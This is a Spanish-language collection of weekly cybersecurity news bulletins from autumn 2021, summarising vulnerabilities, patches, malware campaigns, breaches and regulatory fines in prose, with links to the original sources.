Sanción de 20 millones a Apple y Google por el uso de los datos de usuarios La Autoridad Garante de la Competencia y del Mercado italiana (AGCM) ha sancionado con una multa de 10 millones de euros tanto a Google como a Apple por su método de recopilación y tratamiento de los datos de usuarios con fines comerciales. La Autoridad ha considerado que ambas empresas cometen dos infracciones contra el consumidor. Por un lado, la institución constató que Google y Apple omiten información importante durante el periodo de creación de la cuenta/ID, así como cuando los usuarios utilizan sus servicios, ya que ninguna indica de forma manifiesta cómo van a ser utilizados dichos datos. Por otro lado, la institución destaca el enfoque dado por las empresas en su praxis respecto a la recopilación de datos, calificándolo como “agresivo”. Durante la citada fase de creación de cuenta, Google predefine la aceptación del uso de los datos para fines comerciales por parte del usuario, evitando la necesidad de confirmación por parte de este. En cuanto a Apple, la Autoridad ha dictaminado que la forma de adquisición del consentimiento para el tratamiento de datos con fines comerciales se enfoca de un modo en que condiciona al usuario en su elección, ya que se verá limitado en el uso de sus servicios si no dispensa su control sobre los datos proporcionados. Ambas empresas habrían manifestado su discrepancia en las acusaciones, así como su intención de apelar la sanción. Conoce más detalles: https://www.agcm.it/media/comunicati-stampa/2021/11/PS11147-PS11150 Antiguas vulnerabilidades afectan a modelos de impresoras HP Investigadores de F-Secure han descubierto varias vulnerabilidades que afectan al menos a 150 impresoras multifunción fabricadas por Hewlett Packard. Las vulnerabilidades catalogadas como CVE-2021-39237 y CVE-2021-39238 son de al menos 2013, por lo que se presupone que han podido afectar a una gran cantidad de usuarios en un largo periodo de tiempo. La primera de las vulnerabilidades, con un CVSS de 7.1, se refiere a dos puertos físicos expuestos que otorgan acceso completo al dispositivo, cuya explotación podría suponer una posible fuga de información. Por otro lado, la segunda de las vulnerabilidades cuenta con una puntuación de CVSS de 9.3, que de ser explotada otorgaría a los actores maliciosos una forma de ejecución remota de código. Asimismo, los investigadores han informado acerca de varias formas en las que se podrían explotar estas vulnerabilidades, incluyendo: impresión desde USB, ingeniería social hacia el usuario para que imprima un documento malicioso, imprimir desde otro dispositivo que esté bajo control del atacante, o Cross-site printing, entre otros. La compañía emitió el pasado 1 de noviembre actualizaciones de firmware para estas dos vulnerabilidades más críticas, además de facilitar en cada CVE un hipervínculo con los productos afectados por cada vulnerabilidad y facilitar una guía de buenas prácticas de seguridad para impresoras. Toda la info aquí: https://www.f-secure.com/en/press/p/f-secure-discovers-vulnerabilities-affecting-over-150-hp-printer Emotet propagado por paquetes maliciosos de Adobe Windows App Installer Se ha detectado al reactivado malware Emotet distribuyéndose a través de paquetes maliciosos de una función incorporada de Windows 10 y Windows 11, llamada App Installer. Los actores maliciosos tras este malware, pretenden infectar sistemas al instalar Windows App Installer enmascarados bajo la apariencia de software de Adobe PDF. Esta nueva campaña, comienza con emails de cadenas de respuesta de correos electrónicos robados que aparecen como respuesta a una conversación existente, donde se añade una URL que redirige a un PDF malicioso aparentemente relacionado con el hilo en curso. El enlace suplanta una página de Google Drive donde se muestra un botón de previsualización de PDF, que en realidad es una URL que intenta abrir un archivo de instalación de aplicaciones alojado en Microsoft Azure. Este mismo método fue detectado para distribuir también el malware BazarLoader, donde instalaba paquetes maliciosos alojados en Microsoft Azure. Acciones como esta han permitido a Emotet resurgir y llevar a cabo campañas de phishing a gran escala que instalan posteriormente TrickBot y Qbot, así como conducir a ataques de ransomware. Más detalles aquí: https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/ Fallo en ManageEngine ServiceDesk Plus activamente explotado Investigadores de Unit 42 de Palo Alto han publicado un artículo donde exponen que una APT estaría aprovechando una vulnerabilidad crítica en el servicio ManageEngine ServiceDesk Plus de Zoho catalogada como CVE-2021-44077 con un CVSS de 9.8. El pasado mes de septiembre la CISA alertaba de que un actor malicioso estaría aprovechando la vulnerabilidad CVE-2021-40539 y CVSS 9.8 en ManageEngine ADSelfService Plus de Zoho, siendo en noviembre cuando desde Palo Alto advertían de una segunda campaña más sofisticada donde estaban valiéndose del mismo fallo la cual fue denominada TitledTemple. Desde Palo Alto habrían detectado que posiblemente la misma APT que en meses anteriores estaba aprovechando la vulnerabilidad CVE-2021-40539 habría extendido sus operaciones, explotando ahora también el fallo CVE-2021-44077. El aprovechamiento de este error podría permitir que un usuario remoto no autenticado pudiera cargar ejecutables maliciosos, así como webshells que le podrían permitir el robo de credenciales de administrador, realizar movimientos laterales, entre otros. La atribución por el momento continúa sin ser precisa, desde Palo Alto señalan al grupo de procedencia china APT27 (TG-3390) en ambos casos, mientas que desde el equipo de Threat Intelligence de Microsoft indican que los ataques de septiembre estuvieron protagonizados por DEV-0322. Más información: https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
3 de diciembre de 2021
Boletín semanal de ciberseguridad 20-26 noviembre
Reacharound: posible resurgimiento de la triple amenaza Trickbot-Emotet-Ransomware El pasado mes de enero tuvo lugar, gracias a una acción internacional coordinada por Europol y Eurojust, la desarticulación de la infraestructura de Emotet, malware extensamente empleado en las primeras fases de la cadena de infección de ransomware. Estos hechos contribuyeron, según investigadores de seguridad, al cierre de múltiples operaciones de ransomware-as-a-service (RaaS) de alto nivel. Sin embargo, desde la semana pasada se viene informando sobre el resurgimiento de esta amenaza por partes de investigadores como GData o AdvIntel, quienes señalaban que operadores del ransomware Conti habrían convencido al antiguo operador de Emotet para la reconstrucción de su infraestructura. Estas acciones se habrían producido mediante una campaña que se habría denominado “Reacharound”, la cual se caracteriza por la infección de dispositivos con TrickBot, el cual incluía un payload de Emotet. Investigadores de AdvIntel estiman que el retorno de esta amenaza supondrá un impacto significativo en las operaciones de ransomware debido a tres razones: la alta sofisticación de las capacidades de Emotet, el fomento del conocido como crime-as-a-service en este ámbito y el regreso de la clásica triple amenaza compuesta por TrickBot-Emotet-Ransomware. Más detalles aquí: https://securityaffairs.co/wordpress/124807/cyber-crime/trickbot-emotet-conti-triad.html Publicada PoC para una vulnerabilidad en Microsoft Exchange El investigador de seguridad @testanull, ha publicado una prueba de concepto (PoC) funcional para la vulnerabilidad identificada como CVE-2021-4231 y CVSS de 8.8, que estaría afectando a Microsoft Exchange, la cual fue corregida por Microsoft en el pasado Boletín de Seguridad de noviembre. La vulnerabilidad estaría afectando a los servicios Exchange Server 2016 y 2019 on-premise, pudiendo permitir a un atacante autenticado ejecutar código arbitrario de manera remota. Desde Microsoft informan que habrían detectado actividad relacionada con el aprovechamiento de esta vulnerabilidad de forma ocasional en ataques dirigidos, por lo que recomiendan su corrección. Cabe destacar que no sería la primera vez que durante el 2021 se aprovechan vulnerabilidades en el servicio de Microsoft Exchange para acometer ataques, pues son conocidos los intentos de explotación de ProxyLogon y ProxyShell. Se recomienda hacer uso del programa de diagnóstico de Exchange para comprobar la posible afectación de estas vulnerabilidades. Toda la info: https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169 Nuevo 0-day en Windows con exploit público El investigador de seguridad Abdelhamid Naceri ha hecho público un exploit para un nuevo 0-day en Windows que permitiría a un atacante obtener privilegios de administrador y que afecta a todas las versiones de Windows, incluidas Windows 10, Windows 11 y Windows Server 2022. En concreto Naceri ha conseguido eludir el parche que Microsoft incluía en su boletín mensual de noviembre para una vulnerabilidad de elevación de privilegios en Windows Installer (CVE-2021-41379), vulnerabilidad de la que él mismo informaba a Microsoft. A raíz de este nuevo descubrimiento, ha podido identificar un nuevo 0-day para el que el investigador ha decidido publicar ya el exploit (InstallerFileTakeOver) en su cuenta de GitHub. Con la publicación de este exploit, Naceri pretende unirse al sentimiento de descontento ya mostrado por otros investigadores con Microsoft, por el que denuncian sería una degradación continua de los bounties que se reportan a la firma. Se espera que desde Microsoft parcheen el nuevo fallo en su próximo boletín. El investigador recomienda esperar a la corrección oficial dada la complejidad de la vulnerabilidad. Investigadores de seguridad de Cisco Talos habrían detectado ya muestras de malware que estarían tratando de explotar el nuevo 0-day. Han indicado que los intentos de explotación observados son parte de ataques de bajo volumen, por lo que podría tratarse de pruebas para realizar ajustes en los exploits y que pueden entenderse por tanto como un posible paso previo ante campañas a mayor escala. Descubre más: https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/ Brecha de seguridad en GoDaddy El registrador de dominios GoDaddy ha hecho público un incidente de seguridad detectado el pasado 17 de noviembre, en el que un tercero no autorizado habría accedido al entorno de hosting Managed WordPress de la compañía mediante una contraseña vulnerada. La investigación, que todavía sigue en curso, determina que el atacante tuvo acceso a información de clientes desde el 6 de septiembre de este año hasta el momento de su detección, que fue bloqueado y expulsado del sistema. Entre la información expuesta se encuentra: dirección de correo electrónico y número de cliente de 1.2 millones de usuarios activos e inactivos de Managed WordPress, la contraseña de administrador de WordPress establecida en el momento de la provisión, nombres de usuarios y contraseñas del sFTP y de la base de datos de los usuarios activos y la clave privada de certificados SSL para ciertos usuarios activos. La compañía está contactando con los clientes afectados por esta brecha de seguridad. Cabe destacar que GoDaddy sufrió una fuga de información en mayo del pasado año. Todos los detalles: https://www.sec.gov/Archives/edgar/data/1609711/000160971121000122/gddyblogpostnov222021.htm Vulnerabilidades en MediaTek permiten espiar dispositivos Android La compañía de semiconductores MediaTek ha corregido varios fallos de seguridad que podrían haber permitido a los atacantes espiar llamadas telefónicas de dispositivos Android, ejecutar comandos o escalar privilegios. Los SoC (System on a chip) de MediaTek están integrados en alrededor del 37% de los smartphones y dispositivos IoT del mundo, incluyendo dispositivos de marcas como Xiaomi, Realme y Vivo, entre otras. Tres de estas vulnerabilidades (CVE-2021-0661, CVE-2021-0662 y CVE-2021-0663) se deben a una comprobación incorrecta de límites y fueron corregidas en el boletín de seguridad de MediaTek del pasado mes de octubre, todas ellas con CVSS de 6.7. La cuarta vulnerabilidad tiene asignado el identificador CVE-2021-0673 pero todavía no ha sido corregida. La compañía publicará más detalles sobre el fallo, así como su corrección, en el próximo boletín de seguridad que se publicará en diciembre. Más información: https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp/
26 de noviembre de 2021
Boletín semanal de ciberseguridad 6-12 noviembre
Boletín de seguridad de Microsoft Microsoft ha publicado su boletín de seguridad correspondiente al mes de noviembre en el que ha corregido un total de 55 fallos en su software, incluyendo seis vulnerabilidades 0-day, dos de las cuales se encuentran actualmente bajo explotación. La primera, categorizada como CVE-2021-42292 y con CVSS de 7.8, es un fallo de evasión de mecanismos de seguridad en Microsoft Excel. El segundo 0-day bajo explotación (CVE-2021-42321 y CVSS de 8.8) es una vulnerabilidad de ejecución remota de código en el servidor de Microsoft Exchange. Las cuatro vulnerabilidades 0-day restantes, de las cuales no se han aportado detalles por el momento, son fallos de divulgación de información en Windows Remote Desktop Protocol (CVE-2021-38631 y CVE-2021-41371) y vulnerabilidades de ejecución remota de código en 3D Viewer (CVE-2021-43208 y CVE-2021-43209). Todos los detalles: https://msrc.microsoft.com/update-guide/releaseNote/2021-Nov Campaña contra una vulnerabilidad reciente en Zoho Investigadores de Unit42 de Palo Alto han publicado una investigación sobre una campaña que estaría aprovechando la vulnerabilidad CVE-2021-40539 (CVSS 9.8) en la solución ManageEngine ADSelfService Plus de Zoho. Se trataría de la segunda campaña detectada contra el mismo fallo, ya que el pasado 16 de septiembre la CISA emitió un comunicado donde confirmaba que estaba siendo activamente explotada por una APT. Los intentos de explotación en esta segunda campaña, sin relación con la expuesta por la CISA, comenzaron el 22 de septiembre y no finalizaron hasta principios de octubre, siendo en ese periodo de tiempo cuando el agente amenaza vulneró al menos nueve entidades de diversos sectores. En la cadena de infección los investigadores observaron que, tras obtener acceso a la red de la víctima, se instalaba o bien la webshell Godzilla o el backdoor NGLite, ambos empleados para moverse lateralmente. Al mismo tiempo que conseguían moverse por la infraestructura, exfiltraban información de los servidores hasta que llegaban al DC, donde instalaban la herramienta empleada para el robo de credenciales KdcSponge. Cabe destacar que mientras Palo Alto relaciona esta campaña el grupo APT27 (TG-3390), de origen chino, el equipo de Threat Intelligence de Microsoft, que también ha seguido la explotación de la misma vulnerabilidad, ha atribuido la campaña al actor de procedencia china DEV-0322, relacionado con el incidente el SolarWinds. Descubre más: https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ Acceso no autorizado a Aruba Central HPE ha informado acerca de un incidente de seguridad que habría derivado en el acceso de un tercero no autorizado a información en el entorno Cloud de Aruba Central. El actor, aun no identificado, habría accedido mediante el uso de una clave de acceso robada, la cual le permitió ver los datos almacenados de usuarios. En concreto, se habrían visto afectados un repositorio que contenía datos de telemetría de red de los clientes, y otro con datos sobre la ubicación de los dispositivos WiFi, viéndose afectados datos como la dirección MAC, dirección IP, tipo de sistema operativo, nombre del host, y nombre de usuario en redes WiFi donde es necesaria la autenticación. De acuerdo con la información proporcionada por la compañía, el atacante habría accedido el 9 de octubre por primera vez, logrando establecerse hasta el 27 de octubre, cuando la clave fue cambiada. Esto implicó a su vez que los datos a los que tuvo acceso databan como fecha máxima de antigüedad el 10 de septiembre, ya que son eliminados de los repositorios cada 30 días. Desde HPE habrían confirmado que no se vio afectada información sensible y/o confidencial, no siendo necesaria ninguna acción por parte de los clientes. Toda la info: https://www.arubanetworks.com/support-services/security-bulletins/central-incident-faq/ Múltiples vulnerabilidades en el controlador gráfico de AMD para Windows 10 Investigadores privados de seguridad en colaboración con CyberArk Labs y Apple Media Products RedTeam han reportado una larga lista de vulnerabilidades en el controlador gráfico de AMD para Windows 10. En concreto, 18 de los errores detectados han sido calificados con una gravedad alta ya que, a raíz de un conjunto de fallos en varias APIs, podrían producirse escenarios de escalada de privilegios, denegación de servicio, divulgación de información e incluso ejecución de código arbitrario en la memoria del kernel. Por su parte, AMD ya ha abordado todas las vulnerabilidades y ha publicado un aviso donde reflejan todos los CVEs asignados, así como la información necesaria para aplicar las actualizaciones tanto de AMD Radeon Software como de AMD Radeon Pro Software for Enterprise. Adicionalmente, AMD también ha corregido errores recientemente en su producto AMD EPYC server processor y problemas de rendimiento de sus procesadores compatibles con las nuevas versiones de Windows 11 lanzadas por Microsoft. Más info: https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1000
12 de noviembre de 2021
Boletín semanal de ciberseguridad 30 octubre-5 noviembre
Trojan Source: vulnerabilidad en compiladores de código fuente El investigador de seguridad Investigadores de la Universidad de Cambridge han publicado un paper en el que detallan un nuevo método de ataque denominado “Trojan Source” que permite explotar un fallo presente en la mayoría de los compiladores de código fuente y entornos de desarrollo de software existentes. El método aprovecha las características de los estándares de codificación de texto como Unicode, realizando modificaciones que generan vulnerabilidades en el código fuente que pasarían desapercibidas para un humano y podrían ser implementadas en los principales leguajes de programación como C, C++, C#, JavaScript, Java, Rust, Go y Python. Como resultado, un ataque de este tipo generaría un compromiso de la cadena de suministro de software. Además, la investigación advierte que las vulnerabilidades introducidas en el código fuente persisten en las funciones de copiar y pegar de la mayoría de los navegadores, editores y sistemas operativos modernos, lo que significa que cualquier desarrollador que copie código de una fuente no confiable en una base de código protegida podría introducir inadvertidamente vulnerabilidades “invisibles” en un sistema. Los investigadores ya han compartido estos hallazgos con 19 organizaciones involucradas, muchas de las cuales ya se encuentran desarrollando actualizaciones para abordar el problema en compiladores de código, intérpretes, editores de código y repositorios (p.ej: Rust lo ha catalogado con el identificador CVE-2021-42574). Asimismo, existen diferentes pruebas de concepto que simulan ataques en los lenguajes de programación descritos. Descubre más: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/146100_trojan-source.pdf BlackMatter anuncia la clausura de operaciones ante la presión de las autoridades Los actores amenaza relacionados con el ransomware BlackMatter han anunciado el cierre de operaciones debido a la presión de las autoridades locales. Investigadores de la plataforma VX-Underground han difundido una captura de pantalla del comunicado, publicado en el sitio web privado de RaaS (Ransomware-as-a- service) donde los operadores se comunican y ofrecen sus servicios a los afiliados. La traducción del mensaje, originalmente escrito en ruso, afirma que la infraestructura de BlackMatter será clausurada en las próximas 48 horas, aunque abren la posibilidad de seguir facilitando a los afiliados los descifradores necesarios para continuar con sus operaciones de extorsión. Algunos medios apuntan que la motivación del grupo responde a la reciente publicación de unos informes de Microsoft y Gemini Advisory que relacionaban al grupo FIN7 (considerados los creadores de BlackMatter) con una empresa pública Bastion Secure, así como el aumento de arrestos de individuos pertenecientes a otros grupos de ransomware. Toda la info: https://twitter.com/vxunderground/status/1455750066560544769 Reaparece el troyano bancario Mekotio con una campaña mejorada Investigadores de Checkpoint han detectado una nueva campaña del troyano bancario Mekotio con más de cien ataques en las últimas semanas mediante correos electrónicos de phishing que contienen enlaces maliciosos o archivos zip adjuntos. Según los investigadores, esta nueva ola de ataques comenzó tras la operación llevada a cabo por la Guardia Civil española el pasado mes de julio que se saldó con el arresto de 16 personas involucradas en la distribución de este malware. No obstante, los indicios actuales señalan a Brasil como centro de mando de los operadores de Mekotio aunque manteniendo cierta colaboración desde España. El objetivo principal de Mekotio es el robo de credenciales bancarias de usuarios hispanohablantes y su actual versión trae consigo novedades llamativas en su flujo de ataque ya que sus desarrolladores han logrado una mayor ocultación y sigilo a la hora de implementar sus técnicas. Aparte de contar con más capas de ofuscación, el zip adjunto en los correos de phishing contiene un script con capacidades de ubicación y análisis que permiten discriminar a las víctimas en función de su nacionalidad o incluso detectar si el malware se está ejecutando desde una máquina virtual, lo que permite al actor amenaza evadir la detección y, por tanto, desplegar con éxito el malware. Más: https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/ Campaña del actor amenaza Tortilla distribuyendo el ransomware Babuk Investigadores de seguridad de Cisco Talos han identificado una campaña en activo que tiene por objetivo el despliegue del ransomware Babuk a través de la explotación de servidores Microsoft Exchange vulnerables a ProxyShell y PetitPotam. Esta campaña estaría dirigida por el actor amenaza conocido como Tortilla, un grupo que lleva en activo desde julio de 2021 y cuyo objetivo principal son organizaciones localizadas en Estados Unidos, así como Reino Unido, Alemania, Ucrania, Finlandia, Brasil, Honduras y Tailandia, en menor medida. El proceso de infección comienza habitualmente con un downloader en formato DLL o EXE, el cual ejecutará un comando ofuscado de PowerShell y descargará el payload final del ransomware Babuk insertándolo en un nuevo proceso creado ad-hoc (AddInProcess32). Adicionalmente, los investigadores también han observado la presencia de la webshell China Chopper en múltiples sistemas infectados; así como el intento de explotación de otras vulnerabilidades en Atlassian, Apache Struts, Oracle WebLogic, o WordPress. Más detalles: https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html
5 de noviembre de 2021
Boletín semanal de ciberseguridad 23-29 octubre
Google corrige dos 0-days en el navegador Chrome Google ha lanzado una nueva actualización de Chrome (95.0.4638.69) para Windows, Mac y Linux, donde se corrigen 7 vulnerabilidades, siendo dos de ellas 0-days. En relación a estas dos últimas, por un lado, se encuentra la CVE-2021-38000 con un nivel de criticidad alto, descrita como una validación insuficiente de entrada no fiable en Intents; y, por otro lado, la CVE-2021-38003, también con un nivel de criticidad alto, descrita como una implementación inapropiada en V8. Desde Google afirman que ambas vulnerabilidades estarían siendo explotadas activamente, si bien, por el momento no han ofrecido más información al respecto, aunque es probable que los detalles de estas sean desglosados en futuros informes de Google TAG o Project Zero ya que han sido investigadores de estos proyectos quienes las han detectado. Toda la información aquí: https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html Nueva actividad del actor ruso Nobelium El equipo de Threat Intelligence de Microsoft ha detectado nueva actividad asociada con el grupo de actores Nobelium, identificados por el gobierno de Estados Unidos como parte del servicio de inteligencia extranjero ruso (SRV) y a quienes se ha atribuido el ataque a la cadena de suministro de SolarWinds en 2020. En referencia a la actividad observada de esta nueva campaña, se llevaría realizando desde el pasado mes mayo y está centrada principalmente en Estados Unidos y Europa, siguiendo una estrategia similar a campañas anteriores, pero atacando una parte distinta de la cadena de suministro. En esta ocasión, Nobelium ha intentado acceder a clientes de múltiples proveedores de servicios Cloud (CSP), proveedores de servicios gestionados (MSP), así como otras organizaciones que ofrecen servicios IT a empresas. Cabe destacar que se ha observado al grupo de actores enlazar el acceso de cuatro proveedores distintos con el fin de comprometer un objetivo final, demostrando un gran abanico de técnicas y una complejidad de acciones que usa este actor amenaza para explotar relaciones de confianza entre empresas. Se estima que un total de 140 proveedores de cloud y servicios gestionados han sido atacados, y por lo menos 14 han sido comprometidos desde mayo de 2021. Más detalles: https://blogs.microsoft.com/on-the-issues/2021/10/24/new-activity-from-russian-actor-nobelium/ Squirrelwaffle: nuevo malware distribuido en campañas de malspam Investigadores de Cisco Talos Intelligence han alertado sobre una nueva familia de malware descubierta por primera vez en septiembre de 2021 denominada como Squirrelwaffle. Esta amenaza se propaga a través de campañas de malspam, donde en las más recientes, es utilizado para infectar sistemas con Qakbot y Cobalt Strike. Este malware, proporciona a los actores maliciosos un punto de apoyo inicial en los sistemas y sus entornos de red, con el objetivo de facilitar un mayor compromiso. La campaña, de manera similar a lo que se ha observado en amenazas como Emotet, aprovecha hilos de correo electrónico robados, y dirigen los mensajes de respuesta coincidiendo con el idioma utilizado en el hilo original, denotando cierta localización de forma dinámica. Sus correos maliciosos incluyen hipervínculos a archivos ZIP maliciosos alojados en servidores web, en donde se incluyen archivos .doc o .xls maliciosos que ejecutan código de recuperación de malware en el caso de abrirse. Asimismo, utilizan la plataforma DocuSign como cebo para que se habiliten los macros. Squirrelwaffle presenta una lista de bloqueo de IP de firmas de seguridad con el objetivo de intentar evadir la detección y el análisis. Finalmente, los investigadores informan que este malware se considera que puede ser un reinicio de Emotet, y se advierte que las campañas pueden aumentar con el tiempo tras aumentar el tamaño de su botnet. Más información: https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html Vulnerabilidades en cajeros Diebold Nixdorf Investigadores de Positive Technologies han descubierto vulnerabilidades en los cajeros automáticos Wincor Cineo, propiedad de la compañía Diebold Nixdorf, que cuentan con los dispensadores RM3 y CMD-V5 2. En concreto, se han descubierto dos vulnerabilidades con una puntuación CVSSv3.0 de 6,8. La explotación de estos fallos de seguridad podrían permitir la retirada de efectivo al acceder al puerto USB del controlador del dispensador, en donde un actor malicioso podría instalar una versión de firmware obsoleta o modificada para evitar el cifrado y permitir que el cajero expida efectivo. La primera vulnerabilidad, CVE-2018-9099, se detectó en el firmware del dispensador CMD-V5 en todas sus versiones. En segundo lugar, CVE-2018-9100, se identificó en el firmware del dispensador RM3 / CRS también en todas sus versiones. El escenario de ataque consta de tres pasos: conectar un dispositivo a un cajero automático, cargar firmware obsoleto y vulnerable y aprovechar los fallos de seguridad para acceder a los casetes dentro de la caja fuerte. Los investigadores instan a las organizaciones de crédito, que para corregir las vulnerabilidades deben solicitar la última versión de firmware a los fabricantes de cajeros automáticos. Descubre todos los detalles: https://www.ptsecurity.com/ww-en/about/news/positive-technologies-demonstrates-how-attackers-could-hack-diebold-nixdorf-atms/ Vulnerabilidad 0-day en Windows El investigador de seguridad Abdelhamid Naceri ha revelado detalles de una vulnerabilidad 0-day de elevación de privilegios que afectaría a todas las versiones de Windows, incluyendo Windows 10, Windows 11 y Windows Server 2022. Este investigador ya avisó a Microsoft del fallo, catalogado como CVE-2021-34484, y que supuestamente corrigieron en agosto. Sin embargo, tras examinar la corrección, Naceri descubrió que el parche no era suficiente y que era capaz de vulnerarlo con un nuevo exploit que ha publicado en GitHub. No obstante, el hecho de que el error requiera que el atacante conozca el nombre y la contraseña del usuario, posiblemente reduzca su uso en ataques generalizados con respecto a otras vulnerabilidades de elevación de privilegios. Toda la info: https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html
29 de octubre de 2021
Boletín semanal de ciberseguridad 9-15 octubre
Boletín de seguridad de Microsoft Microsoft ha publicado su boletín de seguridad correspondiente al mes de octubre en el que ha corregido un total de 81 fallos en su software, incluyendo 4 vulnerabilidades 0-day. De los 81 fallos, 3 han sido categorizadas con severidad crítica. El primer 0-day, categorizado como CVE-2021-40449 y con CVSS de 7.8, es un fallo de elevación de privilegios que, habría sido explotada para llevar a cabo ataques en campañas contra empresas IT, militares y entidades diplomáticas. El segundo 0-day (CVE-2021-40469 y CVSS de 7.2) es una vulnerabilidad de ejecución remota de código en Windows DNS Server. El tercero (CVE-2021-41335 y CVSS de 7.8) se trata de un fallo de elevación de privilegios en el kernel de Windows; y, por último, categorizado como CVE-2021-41338 y con CVSS de 5.5, se encuentra una vulnerabilidad de evasión de seguridad en Windows AppContainer Firewall. Por otro lado, los 3 fallos de severidad crítica corregidos corresponden a vulnerabilidades de ejecución remota de código, dos de ellos en Windows Hyper-V (CVE-2021-38672 y CVE-2021-40461) y el restante (CVE-2021-40486) en Microsoft Word. Se recomienda aplicar las actualizaciones de seguridad lo antes posible. Información completa: https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct Vulnerabilidad en plataformas NFT de OpenSea permiten robar carteras de criptomonedas Investigadores de Check Point han detectado que actores maliciosos podrían vaciar carteras de criptomonedas a través de plataformas NFT maliciosas en OpenSea, uno de los mayores mercados digitales para la compraventa de activos criptográficos. Esta plataforma, activa desde el 2018, cuenta con un total de 24 millones de NFT (tokens no fungibles), llegando a registrar un volumen de hasta 3.400 millones de dólares solo en agosto de 2021. El método de ataque empleado consiste en crear un NFT en el que el agente amenaza incluye un payload malicioso para, posteriormente, distribuirlo a las víctimas. Varios usuarios reportaron que sus carteras se habrían vaciado después de recibir supuestos regalos en el mercado OpenSea, una táctica de marketing conocida como “airdropping” empleada para promocionar nuevos activos virtuales. Desde CheckPoint identificaron que la plataforma permite la subida de archivos con múltiples extensiones (JPG, PNG, GIF, SVG, MP4, WEBM, MP3, WAV, OGG, GLB, GLTF), por lo que hicieron una prueba para reproducir el escenario del ataque, subiendo un SVG con un payload malicioso utilizado para conseguir vaciar las carteras de las posibles víctimas. Los fallos reportados ya han sido corregidos. Más info: https://research.checkpoint.com/2021/check-point-research-prevents-theft-of-crypto-wallets-on-opensea-the-worlds-largest-nft-marketplace/ Ciberataques contra sistemas de tratamiento de aguas La Agencia de Ciberseguridad e Infraestructuras estadounidense (CISA) ha emitido una nueva alerta concerniente a ciberataques contra instalaciones de procesamiento de agua potable y aguas residuales. La actividad observada incluye intentos de comprometer la integridad de los sistemas mediante accesos no autorizados llevados a cabo tanto por actores amenaza conocidos como desconocidos. La nota apunta también a deficiencias conocidas en entidades de este sector como es su susceptibilidad ante ataques de spear-phishing, la explotación de software y sistemas de control obsoletos y no soportados, así como la explotación de sistemas de acceso remoto. En el transcurso de 2021, se han producido diversos incidentes relevantes que encajarían en este esquema, como la identificación en agosto de muestras de ransomware pertenecientes a las familias Ghost y ZuCaNo en los sistemas SCADA de plantas en California, Nevada y Maine. Igualmente, cabe recordar el incidente ocurrido en febrero en una planta de tratamiento de aguas de Florida donde un actor amenaza logró modificar los volúmenes de productos químicos vertidos en las cubetas de potabilización. Todos los detalles: https://us-cert.cisa.gov/ncas/alerts/aa21-287a Aumentan en un 33% las advertencias de Google sobre ataques respaldados por gobiernos El equipo de Threat Analysis Group (TAG) de Google ha publicado información relativa a la cantidad de advertencias generadas por su sistema de alerta “Security warnings for suspected state-sponsored attacks” iniciado en 2012. En concreto, en el transcurso de 2021 este sistema ha enviado más de 50.000 advertencias a usuarios, lo que supone un aumento del 33% respecto al mismo periodo del 2020. Según Google, este servicio monitoriza más de 270 grupos de atacantes en 50 países diferentes, generando avisos en el momento que se detectan intentos de phishing, distribución de malware o ataques de fuerza bruta cuyo origen tenga relación con la infraestructura de actores amenaza respaldados por gobiernos conocidos como Privateers. Durante 2021 Google destaca dos actores amenaza sobre el resto, atendiendo al impacto provocado por sus campañas centradas en activistas, periodistas, funcionarios gubernamentales o trabajadores de estructuras de seguridad nacional, identificados como APT28 o "Fancy Bear" con el apoyo de Rusia y APT35 o "Charming Kitten", un actor amenaza iraní activo desde al menos 2014. Adicionalmente, la publicación señala que en el caso de recibir una alerta de este tipo significa que la cuenta se considera como un “objetivo” y no necesariamente implica que haya sido comprometida, por lo que animan a los usuarios a inscribirse a este servicio o habilitar en su defecto el doble factor de autenticación en sus cuentas. Más: https://blog.google/threat-analysis-group/countering-threats-iran/ TrickBot duplica y diversifica sus esfuerzos de infección Investigadores de IBM han rastreado la actividad del grupo ITG23, también conocido como TrickBot Gang y Wizard Spider, tras observar un incremento en la expansión de los canales de distribución utilizados para infectar a las organizaciones y empresas con Trickbot y BazarLoader, muestras empleadas para organizar ataques dirigidos de ransomware y extorsión. Tras los análisis realizados, IBM estima que este incremento podría haber contribuido al pico de actividad del ransomware Conti alertado por la CISA el pasado septiembre. Asimismo, los investigadores han asociado a ITG23 con dos grupos afiliados a la distribución de malware como Hive0106 (también conocido como TA551) y Hive0107. Estos se caracterizan por perpetran ataques con el objetivo de infectar redes corporativas con malware, utilizando técnicas como el secuestro de hilos de correo electrónico, uso de formularios de respuesta de atención al cliente falsos, además del uso de call centers undeground empleados en campañas de BazarCall. Estas TTPs estarían desencadenando en un incremento de intentos de infección por parte de estos grupos. Descubre más: https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/
15 de octubre de 2021
Boletín semanal de ciberseguridad 2-8 octubre
